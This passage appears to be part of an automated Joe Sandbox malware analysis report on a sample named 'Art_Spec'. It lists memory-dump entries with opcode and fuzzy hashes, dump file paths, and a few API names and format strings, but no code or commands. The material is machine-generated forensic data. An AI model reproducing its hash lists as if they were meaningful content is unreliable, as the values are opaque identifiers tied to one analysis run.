                                                        • Opcode ID: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
                                                        • Instruction ID: 8630a5a0a1c244a63bbc1f3043b4f700fba82b7cc8a7bb25d12f3b7525a2264c
                                                        • Opcode Fuzzy Hash: dffb11c3178d60765fe17c8b3786c6f187e5e8bfb9f0e502a08943c1fcf66a74
                                                        • Instruction Fuzzy Hash: 6A118B32241641EFDB15EF19CD80F56BBB8FF54B48F240069EA069B661C235ED01CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
                                                        • Instruction ID: a54b752835416f37a10495b4ad96a3cac61c5438b2c0a746921130e816bf3acc
                                                        • Opcode Fuzzy Hash: 8e10dfd7eedb423a4d7a7d52272b4998c2eb671cb64f33dadaa54e33c03c00ed
                                                        • Instruction Fuzzy Hash: A4115E7054122DABEB25AF68CD42FE97274BF04714F5041D9A719AA1E1D6709E81CF84
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
                                                        • Instruction ID: 7e1949b4d10b70e19d3b84a0e6adceca71c0cb9b6109ec10d21cc4df23bd9e9f
                                                        • Opcode Fuzzy Hash: 3dec23d32ad359fc31f792185c587ae461355fe732c4b58cc01011a88ae491e2
                                                        • Instruction Fuzzy Hash: 93111BB2900119BBCB15DB98CC85DDFBB7CEF58258F054166E506A7211EA34EA15CBE0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                        • Instruction ID: 928ba87456a1e3615b2072fd475a4c8e4bd8ee3c4a4b5d5b42c2ea06683ce1e0
                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                        • Instruction Fuzzy Hash: B20128322001018BDF229A5DD8C0BD3776BBFC8704F1642BAEE018F696EA71EC85C790
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
                                                        • Instruction ID: 78ddb7178751d933d30d8c7fa698fcee8332b1780738f47b97fa30e91416d2f5
                                                        • Opcode Fuzzy Hash: f9481dd13eb01ac3bc310d64caad36ef99f79c1bfb7ec7c531f35d914a704f70
                                                        • Instruction Fuzzy Hash: 0511C8726441459FD711CF58D400BA6BBB5FB56314F09815AE848CF325D731EC41CBE0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e61892505c85066fd458535fe71f3db05c60aabd1a82a7395c13fb7f4f7f75af
                                                        • Instruction ID: 03782e0ecd1dc77e1ac28afad6896ad7a22d60cc120fa1dda90bf5dbb9559729
                                                        • Opcode Fuzzy Hash: e61892505c85066fd458535fe71f3db05c60aabd1a82a7395c13fb7f4f7f75af
                                                        • Instruction Fuzzy Hash: 73F0A76A4176850ACB326B3C74602D26F5CE762114F5F244BE4A157339C6759883C365
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d85934003ede1059b1b21168d7b1a2326998f994a22bebd915d3bfd348677107
                                                        • Instruction ID: 169bf3ca00dc4ea5925757219d44aeaa86e234c296281eb64f9f5058d3cc188d
                                                        • Opcode Fuzzy Hash: d85934003ede1059b1b21168d7b1a2326998f994a22bebd915d3bfd348677107
                                                        • Instruction Fuzzy Hash: 7FF0E2715117719FE722971CC14CB2B7BE89B817BCF0CB426D44A875D2C264F880CE50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction ID: 636e81f48a015878a1030414474470e5fd172a657c54ce589e66e32434d5a141
                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                        • Instruction Fuzzy Hash: 54E0D8323006016BE7119E5D8CC0F477B6EDFD6B28F04007DB6045F251C9E2DC0987A4
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction ID: d5b340264fb88544fb9868809f9ee43145c6a0c45ddc57922b1aec52796f902c
                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                        • Instruction Fuzzy Hash: B5F030B22042049FF321CF19D944F52B7F8EB06765F46C02AE6099B661D379EC40CFA4
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction ID: a7e0e3e2b50ab66882968e693147531a6bb147a87875534873023d435b686b1a
                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                        • Instruction Fuzzy Hash: 33F0E5392087459BDB1ACF2AC090AD6BBF8FB51354F000499F9468B751E732EE82CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction ID: 3d7ae5348641096d0236f3484e763984e5b1920cb04520a30737d9b73f83a7b0
                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                        • Instruction Fuzzy Hash: 39E0D832344359ABE3211A5D8808B6677EADBD87F4F150429E204CB5D0DB70DC40C7D8
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction ID: 4cbf7307f84292e35d8d3b76f06497504b47a055aba49e5e98071ab8e087e88a
                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                        • Instruction Fuzzy Hash: E2E0DF32A00220FBEB2197998D05F9BBEACDB94EA4F060155FA00E71E0E530EE00C690
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction ID: cf1caff1e0405095b9e93e9eb4d976e324f23ea05e44f520f4e7c495f1298946
                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                        • Instruction Fuzzy Hash: 8AE09B316603508BCB25AA1EC540A5BB7E8DFA5661F15806FED0547732C231F887C6D0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode Fuzzy Hash: 315b56235793a4ff83693dd552e47942ded2f97b60770189c501ba2b76daffa8
                                                        • Instruction Fuzzy Hash: A7900231A15C01529141715949845464005A7F0301B55C022E0424599CCB348A965761
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b00f7ee34179cccd38fafb43b98e32f235d2ffdd87bd332cabed24ad562e101e
                                                        • Instruction ID: 33c75decb325abbf84cbd9190303221393f2cde13f4fe1e5c18940c8e07ad830
                                                        • Opcode Fuzzy Hash: b00f7ee34179cccd38fafb43b98e32f235d2ffdd87bd332cabed24ad562e101e
                                                        • Instruction Fuzzy Hash: 17900261A11901824141715949044066005A7F1301395C126A05545A5CC73889959769
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0172a97c8cc9fb7ba94f456c6be15e650d6867c27d4d0cc00f544d8bd074179d
                                                        • Instruction ID: b96ad40fe35e8bebdf48de07c67f251601ae7d362cd7117d4dbeb59ce0b994a5
                                                        • Opcode Fuzzy Hash: 0172a97c8cc9fb7ba94f456c6be15e650d6867c27d4d0cc00f544d8bd074179d
                                                        • Instruction Fuzzy Hash: 55900231A1580942D15171594514746000597E0301F55C022A0024699DC7758B957BA1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abbb7940e2c32701ff455b4e36f7cb13125a7e54e5e1819b2cd585a73c37b3ff
                                                        • Instruction ID: 28e5ec760b18d01cca8f8be5cd3875bb9f306357cd2faa592a70dbc62ecdec59
                                                        • Opcode Fuzzy Hash: abbb7940e2c32701ff455b4e36f7cb13125a7e54e5e1819b2cd585a73c37b3ff
                                                        • Instruction Fuzzy Hash: 3A90023161180942D10571594904686000597E0301F55C022A602469AED77589D17631
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
                                                        • Instruction ID: 9dd3d6852a32a5dc1681b0446b91f4ea8ada641ffe62a0c62f8b351ad2be71a0
                                                        • Opcode Fuzzy Hash: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
                                                        • Instruction Fuzzy Hash: 2E90023161180942D1817159450464A000597E1301F95C026A0025699DCB358B997BA1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e11263f7bad6ce8444b5475dfedb57d9781d1869519df45fb1d946accfd98f8b
                                                        • Instruction ID: d33fa0c9382c139496f0553caab48c15a7bc1822531a1f54af83d45ddc3379b8
                                                        • Opcode Fuzzy Hash: e11263f7bad6ce8444b5475dfedb57d9781d1869519df45fb1d946accfd98f8b
                                                        • Instruction Fuzzy Hash: 0D90023161584982D14171594504A46001597E0305F55C022A00646D9DD7358E95BB61
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 486307118a430810d6ee875a7382dbd2f39c399b69afeeac4b5f6e607a6e439c
                                                        • Instruction ID: 65ab20091e75a018b813950cdd6c67e4537c653f0f97551cbed0d0a019e18c1e
                                                        • Opcode Fuzzy Hash: 486307118a430810d6ee875a7382dbd2f39c399b69afeeac4b5f6e607a6e439c
                                                        • Instruction Fuzzy Hash: 169002A1611941D24501B2598504B0A450597F0201B55C027E10545A5CC63589919635
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3dcfda585560fe09f4163377864a0c14ec17689b54e04f0460cca8731aa912b1
                                                        • Instruction ID: 15214d5a2468f97fa5b82da981066b10f284d1a7a360b69c633bea709f235a40
                                                        • Opcode Fuzzy Hash: 3dcfda585560fe09f4163377864a0c14ec17689b54e04f0460cca8731aa912b1
                                                        • Instruction Fuzzy Hash: 37900225631801420146B559070450B0445A7E6351395C026F14165D5CC73189A55721
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
                                                        • Instruction ID: b94ff99e4ae1cf3893ccb3da1d07755c33cba2f4c002eceb066e6a52469c29f0
                                                        • Opcode Fuzzy Hash: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
                                                        • Instruction Fuzzy Hash: 4F900225621801430106B5590704507004697E5351355C032F1015595CD73189A15621
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
                                                        • Instruction ID: 1a73d034470c272ec62f72be95b3df8f1b9e506cb41fd57f39028bdb9bc80c12
                                                        • Opcode Fuzzy Hash: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
                                                        • Instruction Fuzzy Hash: 1990022171180143D141715955186064005E7F1301F55D022E0414599CDA3589965722
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
                                                        • Instruction ID: 77900da0c02f8d5bed2c7325aef9f96b2ca3627c205a286beeed864687099072
                                                        • Opcode Fuzzy Hash: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
                                                        • Instruction Fuzzy Hash: C990022962380142D1817159550860A000597E1202F95D426A001559DCCA3589A95721
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
                                                        • Instruction ID: a7952a107aea66a7cd87766fee67fd4af5745959eb5bbcb6891a6b66621189fd
                                                        • Opcode Fuzzy Hash: ebb8bd70de23cb6c9dcee17e4e55b0209365d34de0df70830e0dd77284c59450
                                                        • Instruction Fuzzy Hash: 3390022161584582D10175595508A06000597E0205F55D022A10645DADC7358991A631
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
                                                        • Instruction ID: 3af549ea60d6b52ff773385fefc78c2028f9bcc24c641735d7faa73b405e07be
                                                        • Opcode Fuzzy Hash: bab8b18b770c2c1fe4a2bb4c878972c18155beca60b4ce096360867348c65342
                                                        • Instruction Fuzzy Hash: A390023165180542D142715945046060009A7E0241F95C023A0424599EC7758B96AF61
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
                                                        • Instruction ID: ae56a6fc7267ee771b6fd9efa93172b67a0dd7ace343ebfed6081d6e1a7f7561
                                                        • Opcode Fuzzy Hash: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
                                                        • Instruction Fuzzy Hash: D9900221652842925546B15945045074006A7F0241795C023A1414995CC6369996DB21
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
                                                        • Instruction ID: ba6cecc19f339aca31390c538274fe0752e5b7287e384e9f3eccad53184dabb9
                                                        • Opcode Fuzzy Hash: a7cbee4deec236d4425c5b16431b8ee10c1851e7d040ff56d6b0db5d9f266ac0
                                                        • Instruction Fuzzy Hash: 1A90023161180982D10171594504B46000597F0301F55C027A0124699DC735C9917A21
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                        • Instruction ID: f3e51471236954a8844cd96be8afc5d239b5dbb3e72e5230e4107833c4f73e97
                                                        • Opcode Fuzzy Hash: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
                                                        • Instruction Fuzzy Hash: E590023161180542D10175995508646000597F0301F55D022A502459AEC77589D16631
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                        • Instruction ID: 753c5fd15aa66a9bdb35fe970e931007f48f93b3630c73d705e2de8876551e77
                                                        • Opcode Fuzzy Hash: 28e2c91276b9c188a0739f7d5e0f476b97b442e9f02a50141151f61f50310753
                                                        • Instruction Fuzzy Hash: 3A90023161180543D10171595608707000597E0201F55D422A042459DDD77689916621
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                        • Instruction ID: 9fa4e54edd74b412fdf0c5df0fc9c53f4f7a3c332cc74be897372181559e2dde
                                                        • Opcode Fuzzy Hash: b52a326b3546928e2d6b18e3a03cfa4ac46dafa42f61b4c2787f559b9c20014c
                                                        • Instruction Fuzzy Hash: 9E900221A1580542D14171595518706001597E0201F55D022A0024599DC7798B956BA1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                        • Instruction ID: fb92b34038529c54098faeb211e5e05ff32b140b6076f0cb61388313516acff6
                                                        • Opcode Fuzzy Hash: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
                                                        • Instruction Fuzzy Hash: 3890026175180582D10171594514B060005D7F1301F55C026E1064599DC739CD926626
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                        • Instruction ID: affdeab2f724a0c5912e178e8a8c41035c687710df746d5e138ed948ddc4cd77
                                                        • Opcode Fuzzy Hash: 1103f37c585e65fb2b523d52210dc0ad494f41013091e17d69161c8b0507eca8
                                                        • Instruction Fuzzy Hash: D390026162180182D10571594504706004597F1201F55C023A2154599CC6398DA15625
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                        • Instruction ID: c2b5fc2d5a20dbc90f76d067d55e38de03c518b919734ca72a028cb1cf4b5cb0
                                                        • Opcode Fuzzy Hash: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
                                                        • Instruction Fuzzy Hash: E0900221A11801824141716989449064005BBF1211755C132A0998595DC67989A55B65
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                        • Instruction ID: a1091cbeb686316517bc844c5b2e529672ff1e15a1f8768d77cf280f47c138f2
                                                        • Opcode Fuzzy Hash: 2266a76b47d3bf2a2d0d6f194ac9cb033b7ac89f5ed6cc41bb9c29e78cc15f1f
                                                        • Instruction Fuzzy Hash: 66900231611C0542D10171594908747000597E0302F55C022A516459AEC775C9D16A31
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
